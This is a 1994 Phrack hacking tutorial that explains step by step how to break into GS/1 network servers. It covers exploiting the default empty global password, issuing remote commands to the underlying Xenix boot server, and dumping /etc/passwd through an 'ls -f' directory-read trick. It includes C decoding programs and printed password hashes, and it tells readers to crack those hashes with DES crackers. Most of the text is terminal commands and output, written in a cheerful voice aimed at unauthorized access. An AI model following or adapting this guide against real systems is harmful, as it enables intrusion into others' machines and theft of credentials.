| ==Phrack Magazine== |
|
|
| Volume Five, Issue Forty-Six, File 17 of 28 |
|
|
| **************************************************************************** |
|
|
| [<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<] |
| [<> <>] |
| [<> ----+++===::: GETTiN' D0wN 'N D1RTy wiT Da GS/1 :::===+++---- <>] |
| [<> <>] |
| [<> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <>] |
| [<> <>] |
| [<> Brought to you by: <>] |
| [<> [)elam0 Labz, Inc. and ChURcH oF ThE Non-CoNForMisT <>] |
| [<> <>] |
| [<> Story line: Maldoror -n- [)r. [)elam <>] |
| [<> Main Characters: Menacing Maldoror & The Evil [)r. [)elam <>] |
| [<> Unix Technical Expertise: Wunder-Boy [)elam <>] |
| [<> Sysco Technishun: Marvelous Maldoror <>] |
| [<> <>] |
| [<> Look for other fine [)elamo Labz and ChURcH oF ThE <>] |
| [<> Non-CoNForMisT products already on the market such as <>] |
| [<> DEPL (Delam's Elite Password Leecher), NUIA (Maldoror's <>] |
| [<> Tymnet NUI Attacker), TNET.SLT (Delam's cheap0 Telenet <>] |
| [<> skanner for Telix), PREFIX (Maldoror's telephone prefix <>] |
| [<> identification program), and various other programs and <>] |
| [<> philez written by Dr. Delam, Maldoror, Green Paradox, <>] |
| [<> El Penga, Hellpop, and other certified DLI and CNC members. <>] |
| [<> <>] |
| [>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>] |
|
|
| Index |
| ======================================== |
|
|
| 1. Finding and identifying a GS/1 |
| 2. Getting help |
| 3. Gaining top privilege access |
| 4. Finding the boot server |
| 5. Connecting to the boot server |
| 6. Getting the boot server password file |
| 7. Other avenues |
|
|
|
|
| ---------------------------------------------------------------------------- |
|
|
|
|
| Here's hacking a GS/1 made EZ (for the sophisticated hacker) It is |
| advisable to fill your stein with Sysco and pay close attention... if |
| Sysco is not available in your area, Hacker Pschorr beer will work |
| almost as good... (especially Oktoberfest variety) |
|
|
|
|
| What is a GS/1? |
| --------------- |
| A GS/1 allows a user to connect to various other computers... in other |
| words, it's a server, like a DEC or Xyplex. |
|
|
|
|
| So why hack it? |
| --------------- |
| Cuz itz there... and plus you kan access all sortz of net stuph fer |
| phree. (QSD @ 208057040540 is lame and if you connect to it, you're |
| wasting the GS/1.. the French fone police will fly over to your country |
| and hunt you down like a wild pack of dogs, then hang you by your own |
| twisted pair.) |
|
|
|
|
| What to do: |
| ----------- |
|
|
|
|
|
|
| +--------------------------------------+ |
| + #1. Finding and identifying a GS/1 + |
| +--------------------------------------+ |
|
|
| Find a GS/1 .. they're EZ to identify.. they usually have a prompt of |
| GS/1, though the prompt can be set to whatever you want it to be. A |
| few years ago there were quite a number of GS/1's laying around on |
| Tymnet and Telenet... you can still find a few if you scan the right |
| DNIC's. (If you don't know what the hell I'm talking about, look at |
| some old Phracks and LOD tech. journals.) |
|
|
| The prompt will look similar to this: |
|
|
| (!2) GS/1> |
|
|
| (The (!2) refers to the port you are on) |
|
|
|
|
|
|
| +--------------------+ |
| + #2. Getting help + |
| +--------------------+ |
|
|
| First try typing a '?' to display help items. |
|
|
| A help listing looks like this: |
|
|
| > (!2) GS/1>? |
| > Connect <address>[,<address>] [ ECM ] [ Q ] |
| > DO <macro-name> |
| > Echo <string> |
| > Listen |
| > Pause [<seconds>] |
| > PIng <address> [ timeout ] |
| > SET <param-name> = <value> ... |
| > SHow <argument> ... |
|
|
| At higher privileges such as global (mentioned next) the help will |
| look like this (note the difference in the GS/1 prompt with a # sign): |
|
|
| > (!2) GS/1# ? |
| > BRoadcast ( <address> ) <string> |
| > Connect ( <address> ) <address>[,<address>] [ ECM ] [ Q ] |
| > DEFine <macro-name> = ( <text> ) |
| > DisConnect ( <address> ) [<session number>] |
| > DO ( <address> ) <macro-name> |
| > Echo <string> |
| > Listen ( <address> ) |
| > Pause [<seconds>] |
| > PIng <address> [ timeout ] |
| > ReaD ( <address> ) <option> <parameter> |
| > REMOTE <address> |
| > ROtary ( <address> ) !<rotary> [+|-]= !<portid>[-!<portid>] , ... |
| > SAve ( <address> ) <option> <filename> |
| > SET ( <address> ) <param-name> = <value> ... |
| > SETDefault ( <address> ) [<param-name> = <value>] ... |
| > SHow ( <address> ) <argument> ... |
| > UNDefine ( <address> ) <macro-name> |
| > UNSave ( <address> ) <filename> |
| > ZeroMacros ( <address> ) |
| > ZeroStats ( <address> ) |
|
|
| Additional commands under global privilege are: BRoadcast, DEFine, |
| DisConnect, ReaD, REMOTE, ROtary, UNDefine, UNSave, ZeroMacros, |
| ZeroStats, and a few extra options under the normal user commands. |
|
|
| If you need in-depth help for any of the commands, you can again use the |
| '?' in the following fashion: |
|
|
| > (!2) GS/1>sho ? |
| > SHow ADDRess |
| > SHow ClearingHouseNames [ <name> [ @ <domain> [@ <organ.> ] ] ] |
| > SHow DefaultParameters [<param-name> ...] |
| > SHow GLobalPARameters |
| > SHow NetMAP [ Short | Long ] |
| > SHow PARAmeterS [<param-name> ...] |
| > SHow <param-name> ... |
| > SHow SESsions [ P ] |
| > SHow VERSion |
|
|
| > (!2) GS/1>sh add? |
| > SHow ADDRess |
|
|
| > (!2) GS/1>sh add |
| > ADDRess = &000023B5%07000201E1D7!2 |
|
|
| "sh add" displays your own network, address and port number. |
|
|
| The network is 000023B5 |
| The address is 07000201E1D7 |
| The port number is 2 |
|
|
|
|
|
|
| +------------------------------------+ |
| + #3. Gaining top privilege access + |
| +------------------------------------+ |
|
|
| Figure out the global password. |
|
|
| Do a "set priv=global" command. |
|
|
| Note: |
| ---- |
| There are 3 states to set priv to: user, local, and global. Global is |
| the state with the most privilege. When you attain global privilege, |
| your prompt will change to have a '#' sign at the end of it.. this means |
| you have top priceless (similar to *nix's super user prompt). |
|
|
| The GS/1 will prompt you for a password. The default password on GS/1's |
| is to have no password at all... The GS/1 will still prompt you for a |
| password, but you can enter anything at this point if the password was |
| never set. |
|
|
|
|
|
|
| +-------------------------------+ |
| + #4. Finding the boot server + |
| +-------------------------------+ |
|
|
| Figure out the boot server address available from this GS/1 .. |
|
|
| The boot server is what lies under the GS/1. We've found that GS/1's are |
| actually run on a Xenix operating system.. (which is of course a nice |
| phamiliar territory) It's debatable whether all GS/1's are run on Xenix or |
| not as we have yet to contact the company. (We may put out a 2nd file going |
| into more detail.) |
|
|
| Do a "sh b" or "sh global" as shown in the following examples: |
|
|
| > (!2) GS/1# sh b |
| > BAud = 9600 BootServerAddress = &00000000%070002017781 |
| > BReakAction = ( FlushVC, InBand ) BReakChar = Disabled |
| > BSDelay = None BUffersize = 82 |
|
|
| > (!2) GS/1# sh global |
| > ...............................Global Parameters............................ |
| > DATE = Wed Jun 22 21:16:45 1994 TimeZone = 480 minutes |
| > DaylightSavingsTime = 0 minutes LogoffStr = "L8r laM3r" |
| > WelcomeString = "Welcome to your haqued server (!2), Connected to " |
| > DOmain = "thelabz" Organization = "delam0" |
| > PROmpt = "GS/1>" NMPrompt = "GS/1# " |
| > LocalPassWord = "" GlobalPassWord = "haque-me" |
| > NetMapBroadcast = ON MacType = EtherNET |
| > CONNectAudit = ON ERRorAudit = ON |
| > AUditServerAddress = &000031A4%07000200A3D4 |
| > AUditTrailType = Local |
| > BootServerAddress = &00000000%070002017781 |
|
|
| Side note: the GlobalPassWord is "haque-me" whereas the LocalPassWord is "" |
| ... these are the actual passwords that need to be entered (or in the case |
| of the LocalPassWord, "" matches any string). You'll only be able to |
| "sh global" after a successful "set priv=global". |
|
|
| Now that you have the boot server address, the next step is enabling |
| communication to the boot server. |
|
|
|
|
|
|
| +-------------------------------------+ |
| + #5. Connecting to the boot server + |
| +-------------------------------------+ |
|
|
| Do a REMOTE <address> where address is the address of the machine you |
| want to issue remote commands to. |
|
|
| > (!2) GS/1# REMOTE %070002017781 |
| > (!2) Remote: ? |
| > BInd <address> [-f <bootfile>] [-l <loader>] [<nports>] |
| > BRoadcast ( <address> ) "<string>" |
| > CoPyfile [<address>:]<pathname> [<address>:][<pathname>] |
| > LiSt [ -ls1CR ] [<pathname> ...] |
| > MoVe <pathname> <pathname> |
| > NAme <clearinghouse name> = <address>[,<address>]... |
| > Ping <address> [timeout] |
| > ReMove <pathname> ... |
| > SET [( <address> )] <param-name> = <value> ... |
| > SETDefault <param-name> = <value> ... |
| > SHow <argument> |
| > UNBind <address> |
| > UNDefine <macro name> |
| > UNName <name> |
| > ZeroStats |
| > <BREAK> (to leave remote mode) |
|
|
| Your prompt changes from "(!2) GS/1# " to "(!2) Remote: "... this means |
| you will be issuing commands to whatever remote machine you specified |
| by the REMOTE <address> command. |
|
|
| Notice for this case, the boot server's address was used. |
|
|
| When you get the REMOTE: prompt, you can issue commands that will be |
| executed on the remote machine. Try doing a '?' to see if it's another |
| GS/1.. if not, try doing 'ls' to see if you have a *nix type machine. |
|
|
| Also notice that the help commands on the remote are not the same as |
| those for the GS/1 (though, if you establish a remote link with another |
| GS/1 they will be the same). |
|
|
| > (!2) Remote: ls -l |
| > total 1174 |
| > drwxrwxrwx 2 ncs ncs 160 Aug 17 1989 AC |
| > drwxrwxrwx 2 ncs ncs 5920 Jun 5 00:00 AUDIT_TRAIL |
| > drwxrwxrwx 2 ncs ncs 96 Jun 5 01:00 BACKUP |
| > drwxrwxrwx 2 ncs ncs 240 Jun 4 04:42 BIN |
| > drwxrwxrwx 2 ncs ncs 192 Jun 4 04:13 CONFIGS |
| > drwxrwxrwx 2 ncs ncs 64 Aug 17 1989 DUMP |
| > drwxrwxrwx 2 ncs ncs 80 Aug 17 1989 ETC |
| > drwxrwxrwx 2 ncs ncs 160 Jun 4 04:13 GLOBALS |
| > -rw-r--r-- 1 ncs ncs 228 Jun 5 00:59 btdata |
| > -rw-r--r-- 1 ncs ncs 8192 Jun 8 1993 chnames.dir |
| > -rw-r--r-- 1 ncs ncs 11264 Jun 1 13:41 chnames.pag |
| > drwxrwxrwx 2 ncs ncs 48 Jun 5 00:00 dev |
| > drwx------ 2 bin bin 1024 Aug 17 1989 lost+found |
| > -rw-rw-rw- 1 ncs ncs 557056 Mar 23 1992 macros |
| > -rw-r--r-- 1 ncs ncs 512 Oct 22 1993 passwd |
|
|
| Look familiar?? If not, go to the nearest convenient store and buy the |
| a 12 pack of the cheapest beer you can find.. leave your computer |
| connected so you hurry back, and slam eight or nine cold onez... then |
| look at the screen again. |
|
|
| You're basically doing a Remote Procedure Call for ls to your Xenix boot |
| server. |
|
|
| Notice at this point that the "passwd" is not owned by root. This is |
| because this is not the system password file, and you are not in the |
| "/etc" directory... (yet) |
|
|
| There are a couple of problems: |
|
|
| > (!2) Remote: cat |
| > Invalid REMOTE command |
| > |
| > (!2) Remote: cd /etc |
| > Invalid REMOTE command |
|
|
| You cannot view files and you cannot change directories. |
|
|
| To solve the "cd" problem do the following: |
|
|
| > (!2) Remote: ls -l .. |
| > total 26 |
| > drwxrwxrwx 12 root root 352 Jun 5 00:59 NCS |
| > drwxr-xr-x 2 bin bin 112 Aug 17 1989 adm |
| > drwxrwx--- 2 sysinfo sysinfo 48 Aug 17 1989 backup |
| > drwxr-xr-x 2 bin bin 1552 Aug 17 1989 bin |
| > drwxr-xr-x 20 bin bin 720 Aug 17 1989 lib |
| > drwxrwxrwx 6 ncs ncs 224 Aug 17 1989 ncs |
| > drwxr-xr-x 2 bin bin 32 Aug 17 1989 preserve |
| > drwxr-xr-x 2 bin bin 64 Aug 17 1989 pub |
| > drwxr-xr-x 7 bin bin 144 Aug 17 1989 spool |
| > drwxr-xr-x 9 bin bin 144 Aug 17 1989 sys |
| > drwxr-x--- 2 root root 48 Aug 17 1989 sysadm |
| > drwxrwxrwx 2 bin bin 48 Jun 5 01:00 tmp |
| > |
| > (!2) Remote: ls -l ../.. |
| > total 1402 |
| > -rw-r--r-- 1 root root 1605 Aug 17 1989 .login |
| > -r--r--r-- 1 ncs ncs 1605 Aug 28 1990 .login.ncs |
| > -rw-r--r-- 1 root root 653 Aug 17 1989 .logout |
| > -r--r--r-- 1 ncs ncs 653 Aug 28 1990 .logout.ncs |
| > -rw------- 1 root root 427 Aug 17 1989 .profile |
| > drwxr-xr-x 2 bin bin 2048 Aug 17 1989 bin |
| > -r-------- 1 bin bin 25526 May 4 1989 boot |
| > drwxr-xr-x 6 bin bin 3776 Aug 17 1989 dev |
| > -r-------- 1 bin bin 577 Nov 3 1987 dos |
| > drwxr-xr-x 5 bin bin 1904 Jun 2 12:40 etc |
| > drwxr-xr-x 2 bin bin 64 Aug 17 1989 lib |
| > drwx------ 2 bin bin 1024 Aug 17 1989 lost+found |
| > drwxr-xr-x 2 bin bin 32 Aug 17 1989 mnt |
| > drwxrwxrwx 2 bin bin 512 Jun 5 01:20 tmp |
| > drwxr-xr-x 14 bin bin 224 Aug 17 1989 usr |
| > -rw-r--r-- 1 bin bin 373107 Aug 17 1989 xenix |
| > -rw-r--r-- 1 root root 287702 Aug 17 1989 xenix.old |
|
|
| Your brain should now experience deja vous.. you just found the |
| root directory. (for the non-*nix, lam0-hacker, the root directory |
| has key *nix directories such as /etc, /bin, /dev, /lib, etc. in it.) |
|
|
| Now you can get to /etc/passwd as follows: |
|
|
| > (!2) Remote: ls -l ../../etc |
| > total 1954 |
| > -rwx--x--x 1 bin bin 7110 May 8 1989 accton |
| > -rwx------ 1 bin bin 1943 May 8 1989 asktime |
| > -rwx------ 1 bin bin 31756 May 8 1989 badtrk |
| > -rw-rw-rw- 1 root root 1200 Apr 24 12:40 bootlog |
| > -rwx--x--x 1 bin bin 24726 May 8 1989 brand |
| > -rw-r--r-- 1 bin bin 17 Aug 17 1989 checklist |
| > -rw-r--r-- 2 bin bin 17 Aug 17 1989 checklist.last |
| > -rw-r--r-- 1 ncs ncs 17 Aug 28 1990 checklist.ncs |
| > -rw-r--r-- 2 bin bin 17 Aug 17 1989 checklist.orig |
| > -rwx------ 1 bin bin 2857 May 8 1989 chsh |
| > -rwx------ 1 bin bin 7550 May 8 1989 clri |
| > -rwx------ 1 bin bin 8034 May 8 1989 cmos |
| > -rwxr-xr-x 1 root bin 31090 Aug 28 1990 cron |
| > -rw-r--r-- 1 bin bin 369 May 8 1989 cshrc |
| > ...... etc. |
| > -rw-r--r-- 1 root root 465 Mar 5 1991 passwd |
|
|
| Yeah, now what?! |
|
|
| You've found the /etc/passwd file, but you don't have "cat" to type the |
| file out. Now you're stuck... so drink a half a bottle of Sysco per |
| person. (We did... and as you'll see, Sysco is the drink of a manly hackers |
| like us... make sure it's the big bottle kind not those girly small |
| onez.) |
|
|
|
|
|
|
| +---------------------------------------------+ |
| + #6. Getting the boot server password file + |
| +---------------------------------------------+ |
|
|
| There is one way to get around the cat problem (no itz n0t puttin |
| catnip laced with somethin U made frum a phile on yer doorstep) |
| It's done using ls. On this Xenix system, the directory structure is |
| the old Unix format: A 16 byte record comprised of a 2 byte I-number |
| and a 14 byte character field. |
|
|
| Note about directory structure for the inquisitive hacker: |
| In a directory record there is a 14 byte string containing the file |
| name, and the 2 byte I-number (2 bytes = an integer in this case) |
| which is a number that is an (I)ndex pointer to the I-node. The |
| I-node then contains the information about where the file's data is |
| actually kept (similar to how a FAT table works on an IBM PC yet a |
| different concept as it has indirect index blocks etc. I won't get |
| into) and what permissions are set for the file. Be warned that in |
| newer *nix implementations, file names can be more than 14 characters |
| and the directory structure will be a bit different than discussed. |
|
|
| The "ls" command has an option that allows you to tell it "this *file* is |
| a *directory*.. so show me what's in the directory"... newer *nix |
| systems won't like this (the -f option) because of the new directory |
| structure. |
|
|
| > (!2) Remote: ls -? |
| > ls: illegal option --? |
| > usage: -1ACFRabcdfgilmnopqrstux [files] |
| > |
| > (!2) Remote: ls -1ACFRabcdfgilmnopqrstux ../../etc/passwd |
| > 28530 ot:BJlx/e8APHe 30580 :0:0:Super use 14962 /:/bin/csh?sys |
| > 25697 m:X/haSqFDwHz1 14929 0:0:System Adm 28265 istration:/usr |
| > 29487 ysadm:/bin/sh? 29283 on:NOLOGIN:1:1 17210 ron daemon for |
| > 28704 eriodic tasks: 14895 ?bin:NOLOGIN:3 13114 :System file a |
| > 28004 inistration:/: 29962 ucp::4:4:Uucp 25697 ministration:/ |
| > 29557 r/spool/uucppu 27746 ic:/usr/lib/uu 28771 /uucico?asg:NO |
| > 20300 GIN:6:6:Assign 25185 le device admi 26990 stration:/:?sy |
| > 26995 nfo:NOLOGIN:10 12602 0:Access to sy 29811 em information |
| > 12090 :?network:NOLO 18759 N:12:12:Mail a 25710 Network admin |
| > 29545 tration:/usr/s 28528 ol/micnet:?lp: 20302 LOGIN:14:3:Pri |
| > 29806 spooler admin 29545 tration:/usr/s 28528 ol/lp:?dos:NOL |
| > 18255 IN:16:10:Acces 8307 to Dos devices 12090 :?ncs:yYNFnHnL |
| > 22327 xcU:100:100:NC 8275 operator:/usr/ |
| > |
| > (!2) Remote: <BRK> |
| > (!2) GS/1# |
|
|
| Wow, kewl. Now that you have a bunch-o-shit on your screen, you have |
| to make some sense out of it. |
|
|
| The password file is almost legible, but the I-numbers still need to be |
| converted to ASCII characters. This can be accomplished in a variety of |
| ways... the easiest is to write a program like the following in C: |
|
|
| On a PC the following code should work: |
|
|
| #include <stdio.h> |
| main() |
| { |
| union { |
| int i; |
| char c[2]; |
| } x; |
| while (1) { |
| printf("Enter I-Number: "); |
| scanf("%d", &x.i); |
| printf("%d = [%c][%c]\n\n", x.i, x.c[0], x.c[1]); |
| } |
| } |
|
|
| On a *nix based system the following code will work (depending on |
| word size and byte arrangement): |
|
|
| #include <stdio.h> |
| main() |
| { |
| union { |
| short int i; |
| char c[2]; |
| } x; |
| while (1) { |
| printf("Enter I-Number: "); |
| scanf("%hd", &x.i); |
| printf("%d = [%c][%c]\n\n", x.i, x.c[1], x.c[0]); |
| } |
| } |
|
|
|
|
| When you have translated the I-numbers you can substitute the ASCII |
| values by hand (or write a d0p3 program to do it for you): |
|
|
| 28530 ot:BJlx/e8APHe 30580 :0:0:Super use 14962 /:/bin/csh?sys |
| 28530 = [r][o] 30580 = [t][w] 14962 = [r][:] |
| root:BJlx/e8APHetw:0:0:Super user:/:/bin/csh?sys |
|
|
| 25697 m:X/haSqFDwHz1 14929 0:0:System Adm 28265 istration:/usr |
| 25697 = [a][d] 14929 = [Q][:] 28265 = [i][n] |
| adm:X/haSqFDwHz1Q:0:0:System Administration:/usr |
|
|
| 29487 ysadm:/bin/sh? 29283 on:NOLOGIN:1:1 17210 ron daemon for |
| 29487 = [/][s] 29283 = [c][r] 17210 = [:][C] |
| /sysadm:/bin/sh?cron:NOLOGIN:1:1:Cron daemon for |
|
|
| 28704 eriodic tasks: 14895 ?bin:NOLOGIN:3 13114 :System file a |
| 28704 = [ ][p] 14895 = [/][:] 13114 = [:][3] |
| periodic tasks:/:?bin:NOLOGIN:3:3:System file a |
|
|
| 28004 inistration:/: 29962 ucp::4:4:Uucp 25697 ministration:/ |
| 28004 = [d][m] 29962 = [^M][u] 25697 = [a][d] |
| dministration:/: |
| uucp::4:4:Uucp administration:/ |
|
|
| 29557 r/spool/uucppu 27746 ic:/usr/lib/uu 28771 /uucico?asg:NO |
| 29557 = [u][s] 27746 = [b][l] 28771 = [c][p] |
| usr/spool/uucppublic:/usr/lib/uucp/uucico?asg:NO |
|
|
| 20300 GIN:6:6:Assign 25185 le device admi 26990 stration:/:?sy |
| 20300 = [L][O] 25185 = [a][b] 26990 = [n][i] |
| LOGIN:6:6:Assignable device administration:/:?sy |
|
|
| 26995 nfo:NOLOGIN:10 12602 0:Access to sy 29811 em information |
| 26995 = [s][i] 12602 = [:][1] 29811 = [s][t] |
| sinfo:NOLOGIN:10:10:Access to system information |
|
|
| 12090 :?network:NOLO 18759 N:12:12:Mail a 25710 Network admin |
| 12090 = [:][/] 18759 = [G][I] 25710 = [n][d] |
| :/:?network:NOLOGIN:12:12:Mail and Network admin |
|
|
| 29545 tration:/usr/s 28528 ol/micnet:?lp: 20302 LOGIN:14:3:Pri |
| 29545 = [i][s] 28528 = [p][o] 20302 = [N][O] |
| istration:/usr/spool/micnet:?lp:NOLOGIN:14:3:Pri |
|
|
| 29806 spooler admin 29545 tration:/usr/s 28528 ol/lp:?dos:NOL |
| 29806 = [n][t] 29545 = [i][s] 28528 = [p][o] |
| nt spooler administration:/usr/spool/lp:?dos:NOL |
|
|
| 18255 IN:16:10:Acces 8307 to Dos devices 12090 :?ncs:yYNFmHnL |
| 18255 = [O][G] 8307 = [s][ ] 12090 = [:][/] |
| OGIN:16:10:Access to Dos devices:/:?ncs:yYNFnHnL |
|
|
| 22327 xcU:100:100:NC 8275 operator:/usr/ |
| 22327 = [7][W] 8275 = [S][ ] |
| 7WxcU:100:100:NCS operator:/usr |
|
|
|
|
| The resulting file will look like the following: |
|
|
| root:BJlx/e8APHetw:0:0:Super user:/:/bin/csh?sys |
| adm:X/haSqFDwHz1Q:0:0:System Administration:/usr |
| /sysadm:/bin/sh?cron:NOLOGIN:1:1:Cron daemon for |
| periodic tasks:/:?bin:NOLOGIN:3:3:System file a |
| dministration:/: |
| uucp::4:4:Uucp administration:/ |
| usr/spool/uucppublic:/usr/lib/uucp/uucico?asg:NO |
| LOGIN:6:6:Assignable device administration:/:?sy |
| sinfo:NOLOGIN:10:10:Access to system information |
| :/:?network:NOLOGIN:12:12:Mail and Network admin |
| istration:/usr/spool/micnet:?lp:NOLOGIN:14:3:Pri |
| nt spooler administration:/usr/spool/lp:?dos:NOL |
| OGIN:16:10:Access to Dos devices:/:?ncs:yYNFmHnL |
| 7WxcU:100:100:NCS operator:/usr |
|
|
| Because the ls command cannot display "non-printable" characters such |
| as the carriage return, it will replace them with a '?' character... |
| delete the '?' characters and divide by line at these locations. When |
| you finish doing that, you'll have a standard /etc/passwd file: |
|
|
| root:BJlx/e8APHetw:0:0:Super user:/:/bin/csh |
| sysadm:X/haSqFDwHz1Q:0:0:System Administration:/usr/sysadm:/bin/sh |
| cron:NOLOGIN:1:1:Cron daemon for periodic tasks:/: |
| bin:NOLOGIN:3:3:System file administration:/: |
| uucp::4:4:Uucp administration:/usr/spool/uucppublic:/usr/lib/uucp/uucico |
| asg:NOLOGIN:6:6:Assignable device administration:/: |
| sysinfo:NOLOGIN:10:10:Access to system information:/: |
| network:NOLOGIN:12:12:Mail and Network administration:/usr/spool/micnet: |
| lp:NOLOGIN:14:3:Print spooler administration:/usr/spool/lp: |
| dos:NOLOGIN:16:10:Access to Dos devices:/: |
| ncs:yYNFmHnL7WxcU:100:100:NCS operator:/usr |
|
|
| Once you've assembled your password file in a standard ASCII form, |
| you'll of course want to crack it with one of the many available DES |
| cracking programs. |
|
|
| +---------------------+ |
| + #7: Other Avenues + |
| +---------------------+ |
|
|
| Find out what else you can play with by first finding what networks are |
| available other than your own, and second, find out what machines are on |
| your network: |
|
|
| >(!2) GS/1# sh att |
| > Attached Networks |
| >&000023B5 |
| >(!2) GS/1# sh nmap l |
| > NETWORK &000023B5 MAP |
| > |
| > 1-%070002017781 SW/AT-NCS 3.0.2 2-%070002A049C5 SW/NB-BR-3.1.1.1 |
| > 3-%0700020269A7 SW/200-A/BSC/SDL22000 4-%07000201C089 SW/200-A/BSC/SDL22020 |
| > 5-%070002023644 SW/200-A/BSC/SDL22020 6-%0700020138B2 SW/AT-NCS 2.1.1 |
| > 7-%070002010855 SW/100-A/BSC 20060 8-%070002018BA2 SW/20-XNS-X.25 .0.2 |
| > .... etc. |
|
|
| The boot server address, from previous examples, is number 1 |
| which contains a description "SW/AT-NCS". Examining the rest of the |
| list, number 6 has the same description. System 12 may be just another |
| address for the boot server or it may be a different Xenix... but it should |
| be Xenix whatever it is. |
|
|
| We have refrained from covering the typical GS/1 information that has been |
| published by others; and instead, covered newer concepts in GS/1 hacking. |
| This phile is not a complete guide to GS/1 hacking; but expect successive |
| publications on the topic. |
|
|
|
|
|
|
|
|
|
|
| |
|
|